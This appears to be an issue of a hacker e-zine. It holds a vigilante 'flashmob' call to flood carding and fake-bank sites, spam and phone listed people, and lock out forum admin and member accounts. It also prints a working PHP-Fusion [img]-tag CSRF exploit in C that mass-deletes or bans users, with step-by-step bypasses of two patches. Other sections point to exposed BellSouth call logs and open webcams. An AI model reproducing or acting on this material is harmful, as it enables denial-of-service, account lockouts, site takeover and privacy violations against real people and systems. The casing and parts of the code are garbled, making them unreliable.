looks like the swiftcashexpress got some more publicity:

http://forums.ebay.de/thread.jspa?threadid=200155900&tstart=160&mod=1120667583832

and it made it in the fucking zone-h defacement archive:

http://www.zone-h.org/en/defacements/view/id=2532512/
they didn't get the most recent version but it is still in there.

we leeched all the bandwidth from mega-buck.com. another fake lottery bites the
dust.

we are trying to kill carding.ru

this site is a forum where people buy and sell paypal, ebay, egold, credit cards,
and other
financial accounts. please leech and spam this site dead. reload the homepage or
contact the
owners. emails you can bomb:
info@mazafaka.ru

you can log in to these admin accounts with bad passwords to lock them out:
administration
render

you can lock out the members also. there is a memberlist here:
http://antidote.kazasena.com/memberlist.txt

report the scammers accounts:

webmoney: z684458941535
e-gold : 2153723

the aa419.org flashmob is occurring or is already done by the time you read this
but we still
need your help!
you can reload these fake banks pages. the targets are:
http://www.nationalfingroup.com/
http://www.alliancedcourier.com/
http://www.westernoceanic.com/
http://www.westminsterexpress.com/
http://www.co-baci.com/
http://www.ltbancorp.com/
http://www.reliancetrustbank.com/
http://www.fcbankuk.com/
http://www.cbonline-international.com/
http://www.tigon-line.com/
http://www.transatlanticinvest.org/
http://www.weststarexpress.com/
http://www.business.gfams.com/
http://www.ntbonline-cayman.com/

you can call the people who run these fake banks!!!
phone numbers:
+27 72-051-6240
+27 724156675
+34 686072781
+32 484 67 50 53
+31 646472805
+33 142748596
+44 709 203 4931
+44 (0) 845 686 0608
+44 1624 672211
+44 2084712109
+1 866-549-1347
+1 866-566-6285
+1 866-556-6234
+1 416 832-6837
+1 218 554-4756

you can fax them:

+1 866-728-4602
+1 416 832-5346
+27 72-051-6240
+31 847499935
+34 686072784
+44 (0) 870 121 0359
+44 1624 661276
+44 709 203 4933
+49 20330931616

you can even sms them:

+27 72-051-6240
+27 724156675
+32 484 67 50 53
+31 646472805
+34 686072781
+1 416 832-6837
you can spam their emails:
tigon-line.com@general-hosting.com
tonymorgan@tigon-line.com
accounts@tigon-line.com
customerservice@tigon-line.com
info@tigon-line.com
johnmeyer@tigon-line.com
info@cbonline-international.com
info@fcbankuk.com
confidential@fcbankuk.com
customerservice@fcbankuk.com
infosa@reliancetrustbank.com
clientservices@westminsterexpress.com
info@westminsterexpress.com
mattwillis99@yahoo.co.uk
info@westernoceanic.com
info@firstnatl.net
info@alliancedcourier.nl
customercare@nationalfingroup.com
info@nationalfingroup.com
admin@nationalfingroup.com
melpaska@hotmail.com
dwilder@gawab.com
bakayokokareem@yahoo.fr
mattwillis99@yahoo.co.uk
avocaaten@netscape.net
melpaska@hotmail.com
ebanking@rcfin.com
customerservice@rcfin.com
akuwud@yahoo.com

if you wish to leech from a always updating large list of targets check out the
mugu marauder
and the lad vampire at

aa419.org. while the flashmob is occurring it will only leech from these targets.
for those who are interested in joining the battle against scammers you should
check out
419eater.com 419sport.com

419eater.com thescambaiter.com aa419.org and if you are so brave as to, join the
antidote by
emailing sheepbyte
thanks to everybody who has participated in this flashmob.
/exit
 ============================
= a new php-fusion exploit =
= found by easyex =
============================
quote:
two security flaws have recently been discovered in the ubb code parsing by two of
our users.
grindordie found that a user

could virtually deface areas of the site that utilise the [color] tags. while this
does not
cause any harm it can be rather

annoying. easyex's discovery is quite a troublesome one, an attacker can

potentially delete
items from your site using the

[img] tags without anyone knowing. as usual i have produced the required fixes.
the
sourceforge files have been updated,

existing users can download the new maincore.php file from the downloads area.
updated i've
refined the code and updated the

files. if you prefer to update the code yourself click read more for instructions.

source: http://www.php-fusion.co.uk/

/*

dark assassins - http://dark-assassins.com/

visit us on irc @ irc.tddirc.net #darkassassins

php-fusion [img][/img] exploit

discovered/coded by easyex

using the [img] [/img] codes we can get an administrator to do a function a normal
member
cannot do.

for example..

[img]/administration/members.php?step=delete&sortby=all&rowstart=0&user_id=1[/img]
this could be in our signature, forum post or in a comment post. when an admin
views the page
with the malicious code it will

automatically load and do the function we selected. in the example it would delete
the member
with the id: 1

because we are using the [img] [/img] code it just shows up as an invalid image.

code usage:

./fusionimg <version> <dir> deluser <start> <end>

./fusionimg <version> <dir> banuser <start> <end>
./fusionimg <version> <dir> delshout <start end>
./fusionimg <version> <dir> deladmin <start end>

<version> is the php-fusion version. enter 6.x or 5.x depending on the version
number.

<start> is the start point of user id(s)

<end> is the end point of the user id(s)

so if we had a vulnerable host running php fusion v6.00.106 or below with say 150
users and we
wanted to delete them all we

would type ./fusionimg 6.x / deluser 1 150 or if we wanted to delete 1 user that
had the id: 5
we would type: ./fusionimg 6.x

/ deluser 5 5

*/

#include <stdio.h>
#include <string.h>
#include <stdlib.h>

int usage() {
printf("usage: ./fusionimg <version> <dir> <option> <start> <end>\n");
printf("example: ./fusionimg 6.x / deluser 1 500\n");
exit(1);
}

int main (int argc, char *argv[]) {

printf("\n");
printf("php-fusion [img][/img] exploit\n");
printf("coded by easyex from the dark assassins crew\n\n");

if(argc < 6 )
usage();

int i;
char cmd[512];
char option[512];
char version[512];
 file *log;
log = fopen("exploit.txt", "w+");

if(log == 0) {
printf("[-] error opening log file.\n");
exit(-1);;
}

fprintf(log, "php-fusion [img][/img] exploit\n");

fprintf(log, "discovered/coded by easyex\n\n");

if(strcmp(argv[1], "6.x") == 0) {
strncpy(version, "administration/", 512);
}

else if(strcmp(argv[1], "5.x") == 0) {

strncpy(version, "fusion_admin/", 512);
}

else {
printf("[-] error, invalid version!\n");
exit(-1);;
}

// there are other options you can do, this is just some of them...

// if you need to find out a users id you can just go to members.php and click
on the user
you want and the id will show

in the url like ?lookup=1

if(strcmp(argv[3], "deluser") == 0) {
strncpy(option, "members.php?step=delete&sortby=all&rowstart=0&user_id=",
512);
fprintf(log, "you have selected to delete %s > %s user(s)\n", argv[4],
argv[5]);
}

else if(strcmp(argv[3], "banuser") == 0) {

strncpy(option,
"members.php?step=ban&act=on&sortby=all&rowstart=0&user_id=", 512);
fprintf(log, "you have selected to ban %s > %s user(s)\n", argv[4],
argv[5]);
}

else if(strcmp(argv[3], "delshout") == 0) {

strncpy(option, "shoutbox.php?action=delete&shout_id=", 512);
fprintf(log, "you have selected to delete %s > %s shoutbox post(s)\n",
argv[4],
argv[5]);
}

// we can delete any account, but we cant add admin accounts

else if(strcmp(argv[3], "deladmin") == 0) {

strncpy(option, "administrators.php?remove=", 512);
 fprintf(log, "you have selected to delete %s > %s administator(s)\n",
argv[4], argv[5]);
}

else {
printf("[-] error, invalid option!\n");
exit(-1);
}

printf("[+] generating image codes...\n\n");

fprintf(log, "add the following lines of code into your signature, forum post
or in a
comment post:\n\n");

for (i = atoi(argv[4]); i <= atoi(argv[5]); i++) {

sprintf(cmd, "[img]%s%s%s%d[/img]", argv[2], version, option, i);
fprintf(log, "%s\n", cmd);
}

printf("[+] completed & logged to exploit.txt\n");

exit(1);
}

php-fusion ubb code security patch bypass

vulnerable: php-fusion: 6.00.106

discovered by: easyex

old code:

code:

$ubbs1[10] = '#\[img\](.*?)\[/img\]#si';
$ubbs2[10] = '<img src=\'\1\' border=\'0\'>';

new code (patch):

code:

code:

$ubbs1[10] = '#\[img\](.*?)(\.(jpg|jpeg|gif|png|jpg|jpeg|gif|png))\[/img\]#si';
$ubbs2[10] = '<img src=\'\1\2\' border=\'0\'>';

but, you can still exploit this latest security patch

old exploit example:

code:

[img]/administration/members.php?step=delete&sortby=all&rowstart=0&user_id=1[/img]

so that was the first example, but now the patch is up we have to bypass that
also, we can do
this by adding a .jpg

extension:

new exploit example:

code:

[img]/administration
members.php?step=delete&sortby=all&rowstart=0&user_id=1&exploit=.jpg[/img]

you can add any image extension that is allowed and the php-fusion <= 6.0 106
bbcode img tag
script injection exploit will

now work with the latest security patch.

to get it to work with the exploit code, if needed modify the following:

code:

sprintf(cmd, "[img]%s%s%s%d[/img]", argv[2], version, option, i);

to

code:

sprintf(cmd, "[img]%s%s%s%d&exploit=.jpg[/img]", argv[2], version, option, i);

and it will now create the correct image tags for the people who are running the
patch.

php-fusion has made the 2nd update to the ubb code security patch to fix the
&exploit=.jpg
problem.

still exploitable. let's take a look at the latest ubb code security patch
code:

$ubbs1[10] =
"#\[img\]((http|ftp|https|ftps)://)(.*?)(\.(jpg|jpeg|gif|png|jpg|jpeg|gif|
png))\[/img\]#sie";
$ubbs2[10] = "'<img src=\'\\1'.str_replace(array('?','&','='),'','\\3').'\\4\'>'";

so now what it does is only allow http:// ftp:// etc in the [img] and it blocks ?
& = etc but
we can get around this...

we can create a directory on a remote host called 'exploit.jpg' or what ever you
like, and
then in the directory you would

create index.php like the following example:

code:

<?php
header("location:
http://example.com/administration/members.php?step=delete&sortby=all&rowstart=0&us
er_id=1&exploit=.jpg");
exit;
?>

so it thinks it's a image file, but really it isnt and it executes the index.php
script and
then the exploit works fine

again, but this time you have to include the host running php-fusion in that
index.php script.

then, you go to the host running php-fusion and then again put it in your
signature, make a
forum post, or comment post

example:

code:

[img]http://theremotehost.com/exploit.jpg[/img]

and all works fine once again.

 ==========================================
= scanning robot files with access diver =
==========================================
by: sheepbyte
i have been doing lots of robots.txt mining on sites and i thought, "there must be
a better
way", and viola! there was.

purpose
-------
use access diver to automate the process or scanning robots.txt files

supplies needed
---------------
access diver
sample robots.txt file
a parsing program

mining robot files is fairly easy with the right tools. first what we will do is
take a
robots.txt file.
access driver exploiter config files are formatted like this:
/urltoscan
root or local or fullurl
checked or unchecked
response code if any

input the robots file into this program:

here is a nice little robots.txt file stripper in c by stderr:

"
/*****************************************************
* robots.c -- parse robots.txt file for urls. *
* *
* author: stderr (stderr.dev@gmail.com) *
*****************************************************/

#include <stdio.h>
#include <ctype.h>

void usage(void)
{
printf("./robots.txt <input file> <output file>\n");
}

int main(int argc, char *argv[])

{
file *input_file;
 file *output_file;

char line[256];
char url[256];

if (argc < 3) {
usage();
exit(1);
}
printf("[+] robots parsing program\n");
printf("[+] written by stderr.\n");
printf("############################\n");
input_file = fopen(argv[1],"r");
if (input_file == 0) {
printf("error opening file.\n");
exit(1);
}
output_file = fopen(argv[2],"w");
if (output_file == 0) {
printf("error opening file.\n");
exit(1);
}

printf("[+] parseing %s\n",argv[1]);

while (fgets(line,sizeof(line),input_file) != null) {
line[0] = tolower(line[0]);
if (sscanf(line,"disallow: %s", &url) > 0) {
fprintf(output_file,"%s\nlocal\n",url);
}
else if (sscanf(line,"allow: %s", &url) > 0) {
fprintf(output_file,"%s\nlocal\n",url);
}
}
printf("[+] results written to %s\n",argv[2]);

fclose(input_file);
fclose(output_file);
return 0;
}

"

once you have done this, save the output to robots1.ini in a directory you will
remember. now,
open access diver and go to
the exploiter tab. click on the folder icon and load the ini file. type the url
where you got
the robots file (like http://whitehouse.gov) and it will scan all the urls for
you. special
thanks to stderr for his
help on this.
this would be good for sites with long robots files like whitehouse.gov and
epa.gov

=================================
= bellsouth and government =
 = doc droppage =
=================================
thanks to the careless management at pnn.gov.co you can see bellsouth call logs in
spanish for
over 100 people. we figured

we'd just give you the url instead of wgeting it. if anybody has an archive of
this site
please contact us so we can make it

available:
http://www.pnn.gov.co/docs/pruebas/moviles/coexistencia/bellsouth/

===========================
= webcam update =
===========================
thanks to snags of digital-deception.net for submitting these:

http://195.243.185.195/view/indexframe.shtml
airport in stuttgard, germany
http://webcam.rockdetente.com/view/indexframe.shtml
didn't bother doing a reverse and arin to find out where this one is, but there's
a nice chick
workin at this recording

studio
http://webcam.lajollademismaloya.com/view/indexframe.shtml
a resort

send your webcams to sheepbyte@gmail.com!

=============================
= spread lynn-cisco project =
=============================
the idea that people can't spread the lynn document on the cisco vuln is bullshit.
although
cisco has been hacked, we believe

more drastic action needs to be taken. we will be maintaining a list of mirrors

for this file
much like 2600 listed decss

mirrors. if you have a mirror set up email us a link. this is an effort to bypass
and stop
censorship. please join us in the

effort. current mirrors:

http://sr2.mytempdir.com/110387
http://rapidshare.de/files/3794495/lynn-cisco.pdf.html
http://www.jwdt.com/~paysan/lynn-cisco.pdf
http://www.warbard.ca/temp/lynn-cisco.pdf
http://www.viruswatch.nl/info/lynn-cisco.pdf
http://www.security.nnov.ru/files/lynn-cisco.pdf

===========================
= the realist's manifesto =
===========================
when i first saw this in "weapons of mass delusion" by richard forno i just had to
include it:
"i call myself a realist and this is my manifesto:
i am a realist. i live my life based on reality, not wishful
thinking, hyperbole, spin, empty promises, fear mongering,
or adherence to a single party platform. i will not subscribe to
a single party line, and most importantly, i pride myself on
routinely doing a very contemporary un-american thing by
thinking for myself and forming my own opinions on the issues
impacting on my life and nation."

i think this is a very important quote because it teaches us to think, speak, and
act as
ourselves and not to conform to the

prejiduce, biased, and corporate driven views that are forced upon us by
glutenous, rich, and
stuck-up american politicians

and businesses. this is not the entire manifesto but just the introduction. i
suggest you get
the book to read it. the

manifesto is in the beginning of the first chapter and is pages long. you can get
the book
online for free at the official website infowarrior.org

===============
= mail.b0x =
===============

i finally got a reply from yahoo geoities abuse. i listed the email that i sent
before but
i'll show it again in case you forgot.
======================
my email:
"dear geocities hosting,
you are hosting the site kenexfinances.com
this site is operating fraudelently and pretending to be an
online bank. there are many ways to tell this bank is fake.
the bank is not listed with any of the proper banking
authorities which is needs to be and there is no reference
of it on the web. the phone number listed resolve to
satellite phones and not actual phone lines. the site makes
outright lies about the operation of its buisness. the web
design is poor. this site has stolen graphics from other
sites along with text and superimposes its name on them. the
site insecurely stores member information which is directly
in the source of the web page. this site is listed with
aa419.org which is an anti 419 scam organization which works
very closely with many government bodies including the south
african police services website located at 419legal.org
the entry for this bank may be found at:
http://aa419.org/fake-banks/fakebanksview.php?key=4224

we request that you shut down this site immediately and save
a back-up of the data for federal authorities which may be
investigating this site. refusal or neglect to shut down
this site is a federal crime and you could be charged with
knowingly allowing criminal activities to occur on your
server.
please reply."

(they are yet to reply to the other message)

their reply:
"hello,

thank you for contacting yahoo! customer care.

thank you for informing us of possible abuse on yahoo! geocities. we

have investigated the site and taken the necessary action. please
continue to notify us of any content you believe violates the geocities
terms of service, located at:

http://docs.yahoo.com/info/terms/geoterms.html

thank you again for contacting yahoo! customer care.

regards,

yahoo! customer care"

this email came about a month after they shut down the site but at least they got
around
to it.
=========================

got a reply from the "recover my accounts" guy who had like 10 "accounts" that got
hacked.
"hey. what if i get some one in russia to help me hack and get my acounts back??
will police
catch me? in russia poeple hack
casions websites , usa and ntto milatery bases u would know u are a hacker urself
and easy get
away with that . so if i get

some one fromthere to help me will i get introuble by any chance?"

reply:
"dear i.r.m.,
i sincerely don't believe these are your accounts. it is most likely the police
won't catch
you soon. the only way they would

catch you is if they caught the russian hacker but it will catch up to you in the
future.
maybe you should give up your petty

dreams with this stupid online game and move on. it is true that those hackers get
into us
computer systems such as military

and government computers but most of them get caught. it isn't easy to get away
from such a
crime because the us government

has unlimited rescources and you have your check from the bank. you will probably
not get in
trouble but bad people get their

"up 'n comings".

lataz,
sheepbyte@tiz"

send articles, questions, comments, concerns, flames, rants, announcements, and

other zine
related info to sheepbyte@gmail.com. for matters dealing with an individual
article please
contact sheepbyte@gmail.com or the member who wrote it.
remember: tiz is best viewed in courier size 10 with a resolution of 800x600 or
greater in a
text editor.

shouts to
----------
34019 of pandora-security
xplicit pwned by his dsl and nickserv
?hate remix-radio
nunez is never on irc... wtf?
thefailure you know why *wink*
dexlyisc his freezer exploded. hahahahahahahahah!
phatal take your trash elsewhere fucker. ouch! slammed in a zine.
gizmo stop hovering. that was between me and him, stay out of it.
kazm thanks for all the help on the hacker torrents and the hosting!
the lwc thanks for the inspiration (lad wrecking crew)

"real patriots don�t ask questions, and normal people don�t

challenge the status quo at least that�s what we�re led to
believe, especially after september 2001. besides, we�re too
busy trying to live up to the promises and visions of being
free that we just don�t have the time or inclination to worry
about such things. real patriots just do what they�re told. so
do sheep." - richard forno's weapons of mass delusion

if that's too political for you:

"
<nes> lol
<nes> i download something from napster
<nes> and the same guy i downloaded it from starts downloading it from me when i'm
done
<nes> i message him and say "what are you doing? i just got that from you"
<nes> "getting my song back fucker"
"
{tiz}
[end of file]